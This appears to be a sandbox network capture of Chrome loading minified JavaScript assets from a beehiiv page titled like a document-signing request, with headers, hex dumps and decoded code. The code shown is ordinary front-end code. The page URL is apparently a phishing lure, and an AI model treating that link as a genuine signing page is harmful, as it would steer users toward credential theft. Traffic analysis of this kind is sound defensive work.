                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                            Referer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-below
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:35 UTC911INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:35 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 561
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"231-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Age: 4162
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d8a658680f39-EWR
                                                                                                                                            2025-01-15 18:14:35 UTC458INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 31 30 64 39 63 32 32 38 2d 33 39 39 30 2d 35 39 32 39 2d 38 39 63 31 2d 33 66 38 32 63 31 63 34 36 37 32 33 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="10d9c228-3990-5929-89c1-3f82c1c46723")}catch(
                                                                                                                                            2025-01-15 18:14:35 UTC103INData Raw: 3b 0a 2f 2f 23 20 73 6f 75 72 63 65 4d 61 70 70 69 6e 67 55 52 4c 3d 75 73 65 49 73 4c 6f 67 67 65 64 49 6e 2d 42 62 55 33 2d 71 34 33 2e 6a 73 2e 6d 61 70 0a 0a 2f 2f 23 20 64 65 62 75 67 49 64 3d 31 30 64 39 63 32 32 38 2d 33 39 39 30 2d 35 39 32 39 2d 38 39 63 31 2d 33 66 38 32 63 31 63 34 36 37 32 33 0a
                                                                                                                                            Data Ascii: ;//# sourceMappingURL=useIsLoggedIn-BbU3-q43.js.map//# debugId=10d9c228-3990-5929-89c1-3f82c1c46723


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            55192.168.2.1649777104.18.68.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:35 UTC553OUTGET /assets/keyboard-CaEu2o0u.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:35 UTC898INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:35 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 7148
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736960859&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=Gdulw2GN2jMrsMu7f5DCs9PfaRHOo6uA4nm0vspAeHE%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736960859&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=Gdulw2GN2jMrsMu7f5DCs9PfaRHOo6uA4nm0vspAeHE%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"1bec-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d8a69d0c42ab-EWR
                                                                                                                                            2025-01-15 18:14:35 UTC471INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 35 62 34 63 37 37 30 64 2d 35 39 62 66 2d 35 62 65 31 2d 61 62 37 38 2d 36 63 66 34 64 31 39 65 32 35 39 39 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="5b4c770d-59bf-5be1-ab78-6cf4d19e2599")}catch(
                                                                                                                                            2025-01-15 18:14:35 UTC1369INData Raw: 2c 6e 29 2c 6e 29 3b 6c 65 74 20 78 3d 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 7b 77 28 74 68 69 73 2c 22 63 75 72 72 65 6e 74 22 2c 74 68 69 73 2e 64 65 74 65 63 74 28 29 29 2c 77 28 74 68 69 73 2c 22 68 61 6e 64 6f 66 66 53 74 61 74 65 22 2c 22 70 65 6e 64 69 6e 67 22 29 2c 77 28 74 68 69 73 2c 22 63 75 72 72 65 6e 74 49 64 22 2c 30 29 7d 73 65 74 28 74 29 7b 74 68 69 73 2e 63 75 72 72 65 6e 74 21 3d 3d 74 26 26 28 74 68 69 73 2e 68 61 6e 64 6f 66 66 53 74 61 74 65 3d 22 70 65 6e 64 69 6e 67 22 2c 74 68 69 73 2e 63 75 72 72 65 6e 74 49 64 3d 30 2c 74 68 69 73 2e 63 75 72 72 65 6e 74 3d 74 29 7d 72 65 73 65 74 28 29 7b 74 68 69 73 2e 73 65 74 28 74 68 69 73 2e 64 65 74 65 63 74 28 29 29 7d 6e 65 78 74 49 64 28 29 7b 72 65 74 75 72 6e 2b
                                                                                                                                            Data Ascii: ,n),n);let x=class{constructor(){w(this,"current",this.detect()),w(this,"handoffState","pending"),w(this,"currentId",0)}set(t){this.current!==t&&(this.handoffState="pending",this.currentId=0,this.current=t)}reset(){this.set(this.detect())}nextId(){return+
                                                                                                                                            2025-01-15 18:14:35 UTC1369INData Raw: 29 7d 29 2c 74 2e 61 64 64 28 28 29 3d 3e 7b 72 2e 63 75 72 72 65 6e 74 3d 21 31 7d 29 7d 2c 73 74 79 6c 65 28 6e 2c 72 2c 6f 29 7b 6c 65 74 20 69 3d 6e 2e 73 74 79 6c 65 2e 67 65 74 50 72 6f 70 65 72 74 79 56 61 6c 75 65 28 72 29 3b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 6e 2e 73 74 79 6c 65 2c 7b 5b 72 5d 3a 6f 7d 29 2c 74 68 69 73 2e 61 64 64 28 28 29 3d 3e 7b 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 6e 2e 73 74 79 6c 65 2c 7b 5b 72 5d 3a 69 7d 29 7d 29 7d 2c 67 72 6f 75 70 28 6e 29 7b 6c 65 74 20 72 3d 4c 28 29 3b 72 65 74 75 72 6e 20 6e 28 72 29 2c 74 68 69 73 2e 61 64 64 28 28 29 3d 3e 72 2e 64 69 73 70 6f 73 65 28 29 29 7d 2c 61 64 64 28 6e 29 7b 72 65 74 75 72 6e 20 65 2e 70 75 73 68 28 6e 29 2c 28 29 3d 3e 7b 6c 65 74 20
                                                                                                                                            Data Ascii: )}),t.add(()=>{r.current=!1})},style(n,r,o){let i=n.style.getPropertyValue(r);return Object.assign(n.style,{[r]:o}),this.add(()=>{Object.assign(n.style,{[r]:i})})},group(n){let r=L();return n(r),this.add(()=>r.dispose())},add(n){return e.push(n),()=>{let
                                                                                                                                            2025-01-15 18:14:35 UTC1369INData Raw: 2e 63 75 72 72 65 6e 74 20 69 6e 73 74 61 6e 63 65 6f 66 20 48 54 4d 4c 42 75 74 74 6f 6e 45 6c 65 6d 65 6e 74 26 26 21 74 2e 63 75 72 72 65 6e 74 2e 68 61 73 41 74 74 72 69 62 75 74 65 28 22 74 79 70 65 22 29 26 26 72 28 22 62 75 74 74 6f 6e 22 29 7d 2c 5b 6e 2c 74 5d 29 2c 6e 7d 6c 65 74 20 6b 3d 53 79 6d 62 6f 6c 28 29 3b 66 75 6e 63 74 69 6f 6e 20 4a 28 65 2c 74 3d 21 30 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 65 2c 7b 5b 6b 5d 3a 74 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 4b 28 2e 2e 2e 65 29 7b 6c 65 74 20 74 3d 61 2e 75 73 65 52 65 66 28 65 29 3b 61 2e 75 73 65 45 66 66 65 63 74 28 28 29 3d 3e 7b 74 2e 63 75 72 72 65 6e 74 3d 65 7d 2c 5b 65 5d 29 3b 6c 65 74 20 6e 3d 48 28 72 3d 3e 7b 66 6f 72 28 6c 65 74 20 6f 20 6f 66 20
                                                                                                                                            Data Ascii: .current instanceof HTMLButtonElement&&!t.current.hasAttribute("type")&&r("button")},[n,t]),n}let k=Symbol();function J(e,t=!0){return Object.assign(e,{[k]:t})}function K(...e){let t=a.useRef(e);a.useEffect(()=>{t.current=e},[e]);let n=H(r=>{for(let o of
                                                                                                                                            2025-01-15 18:14:35 UTC1369INData Raw: 3b 63 26 26 28 70 5b 22 64 61 74 61 2d 68 65 61 64 6c 65 73 73 75 69 2d 73 74 61 74 65 22 5d 3d 79 2e 6a 6f 69 6e 28 22 20 22 29 29 7d 69 66 28 69 3d 3d 3d 61 2e 46 72 61 67 6d 65 6e 74 26 26 4f 62 6a 65 63 74 2e 6b 65 79 73 28 24 28 73 29 29 2e 6c 65 6e 67 74 68 3e 30 29 7b 69 66 28 21 61 2e 69 73 56 61 6c 69 64 45 6c 65 6d 65 6e 74 28 75 29 7c 7c 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 75 29 26 26 75 2e 6c 65 6e 67 74 68 3e 31 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 5b 27 50 61 73 73 69 6e 67 20 70 72 6f 70 73 20 6f 6e 20 22 46 72 61 67 6d 65 6e 74 22 21 27 2c 22 22 2c 60 54 68 65 20 63 75 72 72 65 6e 74 20 63 6f 6d 70 6f 6e 65 6e 74 20 3c 24 7b 72 7d 20 2f 3e 20 69 73 20 72 65 6e 64 65 72 69 6e 67 20 61 20 22 46 72 61 67 6d 65 6e 74 22 2e
                                                                                                                                            Data Ascii: ;c&&(p["data-headlessui-state"]=y.join(" "))}if(i===a.Fragment&&Object.keys($(s)).length>0){if(!a.isValidElement(u)||Array.isArray(u)&&u.length>1)throw new Error(['Passing props on "Fragment"!',"",`The current component <${r} /> is rendering a "Fragment".
                                                                                                                                            2025-01-15 18:14:35 UTC1201INData Raw: 69 6e 20 72 29 6f 2e 73 74 61 72 74 73 57 69 74 68 28 22 6f 6e 22 29 26 26 74 79 70 65 6f 66 20 72 5b 6f 5d 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 28 6e 5b 6f 5d 21 3d 6e 75 6c 6c 7c 7c 28 6e 5b 6f 5d 3d 5b 5d 29 2c 6e 5b 6f 5d 2e 70 75 73 68 28 72 5b 6f 5d 29 29 3a 74 5b 6f 5d 3d 72 5b 6f 5d 3b 69 66 28 74 2e 64 69 73 61 62 6c 65 64 7c 7c 74 5b 22 61 72 69 61 2d 64 69 73 61 62 6c 65 64 22 5d 29 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 74 2c 4f 62 6a 65 63 74 2e 66 72 6f 6d 45 6e 74 72 69 65 73 28 4f 62 6a 65 63 74 2e 6b 65 79 73 28 6e 29 2e 6d 61 70 28 72 3d 3e 5b 72 2c 76 6f 69 64 20 30 5d 29 29 29 3b 66 6f 72 28 6c 65 74 20 72 20 69 6e 20 6e 29 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 74 2c 7b 5b 72 5d 28 6f 2c 2e 2e 2e 69 29 7b
                                                                                                                                            Data Ascii: in r)o.startsWith("on")&&typeof r[o]=="function"?(n[o]!=null||(n[o]=[]),n[o].push(r[o])):t[o]=r[o];if(t.disabled||t["aria-disabled"])return Object.assign(t,Object.fromEntries(Object.keys(n).map(r=>[r,void 0])));for(let r in n)Object.assign(t,{[r](o,...i){


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            56192.168.2.1649778104.18.69.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:35 UTC840OUTGET /assets/index-EzvqLY92.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                            Origin: https://kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                            Referer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-below
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:35 UTC912INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:35 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 2258
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"8d2-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Age: 4162
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d8a6da2a0cb2-EWR
                                                                                                                                            2025-01-15 18:14:35 UTC457INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 30 64 32 64 35 34 64 36 2d 33 66 63 39 2d 35 66 36 61 2d 38 30 35 64 2d 36 63 38 30 31 66 37 36 63 35 39 32 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="0d2d54d6-3fc9-5f6a-805d-6c801f76c592")}catch(
                                                                                                                                            2025-01-15 18:14:35 UTC1369INData Raw: 65 78 20 69 74 65 6d 73 2d 63 65 6e 74 65 72 20 64 69 73 61 62 6c 65 64 3a 62 67 2d 67 72 61 79 2d 34 30 30 20 64 69 73 61 62 6c 65 64 3a 63 75 72 73 6f 72 2d 6e 6f 74 2d 61 6c 6c 6f 77 65 64 20 66 6f 63 75 73 3a 6f 75 74 6c 69 6e 65 2d 6e 6f 6e 65 20 66 6f 63 75 73 3a 72 69 6e 67 2d 32 20 66 6f 63 75 73 3a 72 69 6e 67 2d 6f 66 66 73 65 74 2d 32 20 6a 75 73 74 69 66 79 2d 63 65 6e 74 65 72 20 74 72 61 6e 73 69 74 69 6f 6e 2d 63 6f 6c 6f 72 73 22 2c 6d 3d 22 62 6f 72 64 65 72 2d 77 74 2d 70 72 69 6d 61 72 79 20 74 65 78 74 2d 77 74 2d 74 65 78 74 2d 6f 6e 2d 70 72 69 6d 61 72 79 20 62 67 2d 77 74 2d 70 72 69 6d 61 72 79 20 64 69 73 61 62 6c 65 64 3a 62 6f 72 64 65 72 2d 67 72 61 79 2d 35 30 30 20 66 6f 63 75 73 3a 72 69 6e 67 2d 77 74 2d 70 72 69 6d 61 72
                                                                                                                                            Data Ascii: ex items-center disabled:bg-gray-400 disabled:cursor-not-allowed focus:outline-none focus:ring-2 focus:ring-offset-2 justify-center transition-colors",m="border-wt-primary text-wt-text-on-primary bg-wt-primary disabled:border-gray-500 focus:ring-wt-primar
                                                                                                                                            2025-01-15 18:14:35 UTC432INData Raw: 3d 3d 3d 22 66 6c 75 73 68 22 3f 41 3a 22 22 2c 53 3f 22 64 69 73 61 62 6c 65 64 3a 63 75 72 73 6f 72 2d 6e 6f 74 2d 61 6c 6c 6f 77 65 64 20 6f 70 61 63 69 74 79 2d 36 30 20 62 6f 72 64 65 72 2d 74 72 61 6e 73 70 61 72 65 6e 74 22 3a 22 22 2c 6f 3f 22 64 69 73 61 62 6c 65 64 3a 63 75 72 73 6f 72 2d 6e 6f 74 2d 61 6c 6c 6f 77 65 64 20 62 6f 72 64 65 72 2d 74 72 61 6e 73 70 61 72 65 6e 74 22 3a 22 22 2c 69 3f 22 77 2d 66 75 6c 6c 22 3a 22 22 2c 63 29 3b 72 65 74 75 72 6e 20 74 3f 6e 2e 6a 73 78 28 75 2c 7b 74 6f 3a 74 3f 2e 74 6f 2c 70 72 65 66 65 74 63 68 3a 74 3f 2e 70 72 65 66 65 74 63 68 7c 7c 22 6e 6f 6e 65 22 2c 63 6c 61 73 73 4e 61 6d 65 3a 61 2c 73 74 79 6c 65 3a 73 2c 63 68 69 6c 64 72 65 6e 3a 65 7d 29 3a 6e 2e 6a 73 78 28 22 62 75 74 74 6f 6e 22
                                                                                                                                            Data Ascii: ==="flush"?A:"",S?"disabled:cursor-not-allowed opacity-60 border-transparent":"",o?"disabled:cursor-not-allowed border-transparent":"",i?"w-full":"",c);return t?n.jsx(u,{to:t?.to,prefetch:t?.prefetch||"none",className:a,style:s,children:e}):n.jsx("button"


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            57192.168.2.1649780104.18.68.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:35 UTC555OUTGET /assets/transition-y-5XFFuu.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:35 UTC907INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:35 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 10089
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736960860&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=FTFAbhRSm%2BLvyAx2y4n1YtRtinTGussYyR%2B2UCmOtto%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736960860&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=FTFAbhRSm%2BLvyAx2y4n1YtRtinTGussYyR%2B2UCmOtto%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"2769-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d8a70b600f5d-EWR
                                                                                                                                            2025-01-15 18:14:35 UTC462INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 61 61 64 34 35 35 36 65 2d 32 35 65 37 2d 35 30 31 36 2d 62 66 31 64 2d 31 33 61 33 31 39 32 39 33 63 36 62 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="aad4556e-25e7-5016-bf1d-13a319293c6b")}catch(
                                                                                                                                            2025-01-15 18:14:35 UTC1369INData Raw: 4c 2c 67 20 61 73 20 72 65 2c 43 20 61 73 20 61 65 7d 66 72 6f 6d 22 2e 2f 6b 65 79 62 6f 61 72 64 2d 43 61 45 75 32 6f 30 75 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 70 20 61 73 20 6f 65 7d 66 72 6f 6d 22 2e 2f 62 75 67 73 2d 44 56 51 7a 42 68 2d 73 2e 6a 73 22 3b 66 75 6e 63 74 69 6f 6e 20 54 65 28 29 7b 72 65 74 75 72 6e 2f 69 50 68 6f 6e 65 2f 67 69 2e 74 65 73 74 28 77 69 6e 64 6f 77 2e 6e 61 76 69 67 61 74 6f 72 2e 70 6c 61 74 66 6f 72 6d 29 7c 7c 2f 4d 61 63 2f 67 69 2e 74 65 73 74 28 77 69 6e 64 6f 77 2e 6e 61 76 69 67 61 74 6f 72 2e 70 6c 61 74 66 6f 72 6d 29 26 26 77 69 6e 64 6f 77 2e 6e 61 76 69 67 61 74 6f 72 2e 6d 61 78 54 6f 75 63 68 50 6f 69 6e 74 73 3e 30 7d 66 75 6e 63 74 69 6f 6e 20 43 65 28 29 7b 72 65 74 75 72 6e 2f 41 6e 64 72 6f 69 64 2f
